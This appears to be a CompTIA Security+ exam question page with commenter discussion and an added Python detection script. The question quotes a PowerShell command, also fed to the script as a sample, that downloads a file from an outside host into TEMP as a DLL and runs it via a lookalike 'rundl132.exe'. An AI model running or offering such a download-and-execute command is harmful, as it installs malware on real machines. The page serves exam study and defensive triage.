Exam SY0-601 topic 1 question 390 discussion

Actual exam question from CompTIA's SY0-601
Question #: 390
Topic #: 1

An employee received an email with an unusual file attachment named Updates.lnk. A security analyst is reverse engineering what the file does and finds that it executes the following script:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -URI https://somehost.com/04EB18.jpg -OutFile $env:TEMP\autoupdate.dll;Start-Process rundl132.exe $env:TEMP\autoupdate.dll

Which of the following BEST describes what the analyst found?

  • A. A PowerShell code is performing a DLL injection.
  • B. A PowerShell code is displaying a picture.
  • C. A PowerShell code is configuring environmental variables.
  • D. A PowerShell code is changing Windows Update settings.
Suggested Answer: A

Comments

ApplebeesWaiter1122
Highly Voted 1 year, 11 months ago
Selected Answer: A
A PowerShell code is performing a DLL injection. The given script executes a PowerShell command that downloads a file from the specified URI (https://somehost.com/04EB18.jpg) and saves it as autoupdate.dll in the temporary folder ($env:TEMP). It then launches the rundl132.exe process to load and execute the downloaded DLL file. This technique is commonly used in DLL injection attacks, where malicious code is injected into a legitimate process to gain unauthorized access or perform malicious activities on a system.
upvoted 26 times
JarnBarn
1 year, 5 months ago
Applebees bebe be the real MVP
upvoted 3 times
Abdulaa
1 year, 9 months ago
that was a good explanation, THX
upvoted 1 times
ID77
1 year, 3 months ago
Thanks Applebees!
upvoted 1 times
Ufuk_Ari
Highly Voted 2 years, 3 months ago
Selected Answer: A
A. Remote server using PowerShell and saving it as "autoupdate.dll" in the user's temporary folder. It then executes the file using the "rundll32.exe" program, which suggests that the file is being used to perform some sort of malicious activity.
upvoted 8 times
Zdane
2 years ago
You are correct! But as another layer of confusion, the question states "rundl132.exe" program...
upvoted 1 times
benni3c
1 year, 9 months ago
I wish they were all like this, it has dll at the end: TEMP\autoupdate.dll
upvoted 2 times
chiachuang
Most Recent 1 year, 7 months ago
Selected Answer: A
A PowerShell code is performing a DLL injection.
upvoted 1 times
Zaak
2 years, 2 months ago
Selected Answer: A
Absolutely 💯
upvoted 4 times
sdc939
2 years, 3 months ago
Selected Answer: A
A. A PowerShell code is performing a DLL injection.
upvoted 3 times
Community vote distribution
A (35%)
C (25%)
B (20%)
Other
Most Voted
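
The command line from the question, run through a small triage check of the kind an analyst could apply to process-creation logs. This is an added example, not part of the original question or any commenter's post. The function names, the finding labels and the second (benign) sample are assumptions made for illustration.

```python
import ntpath
import re
from urllib.parse import urlparse

# Constructed sample input: the command line quoted in the question, then a benign download.
SAMPLES = [
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -URI https://somehost.com/04EB18.jpg"
    r" -OutFile $env:TEMP\autoupdate.dll;Start-Process rundl132.exe $env:TEMP\autoupdate.dll",
    r"powershell.exe Invoke-WebRequest -Uri https://example.test/logo.png -OutFile C:\Users\a\Pictures\logo.png",
]

EXECUTABLE_EXT = {".dll", ".exe", ".scr", ".cpl"}
CONFUSABLE = str.maketrans({"1": "l", "0": "o"})  # digit-for-letter swaps in file names

def arg(cmd, name):
    """Value that follows a -Name parameter (case-insensitive), or None."""
    m = re.search(rf"-{name}\s+([^\s;]+)", cmd, re.IGNORECASE)
    return m.group(1) if m else None

def ext(path):
    """Lower-cased file extension of a Windows path or URL path."""
    return ntpath.splitext(path)[1].lower()

def analyze(cmd):
    """Return triage labels (hypothetical names) for one process command line."""
    findings = []
    uri, out = arg(cmd, "URI"), arg(cmd, "OutFile")
    if uri and out:
        # Content fetched under one extension but saved as an executable type.
        if ext(out) in EXECUTABLE_EXT and ext(urlparse(uri).path) != ext(out):
            findings.append("download-renamed-to-executable")
        if re.search(r"\$env:TEMP|\\Temp\\", out, re.IGNORECASE):
            findings.append("written-to-temp")
    m = re.search(r"Start-Process\s+(\S+)\s+([^\s;]+)", cmd, re.IGNORECASE)
    if m:
        launcher, target = m.group(1).lower(), m.group(2)
        if launcher == "rundll32.exe":
            findings.append("rundll32-launch")
        elif launcher.translate(CONFUSABLE) == "rundll32.exe":
            findings.append("rundll32-lookalike-name")
        if out and target.lower() == out.lower():
            findings.append("executes-downloaded-file")
    return findings

if __name__ == "__main__":
    for sample in SAMPLES:
        print(analyze(sample))
```

The lookalike check exists because the question spells the launcher `rundl132.exe`, with a digit 1 where `rundll32.exe` has a second letter l, so an exact-name match alone would miss it.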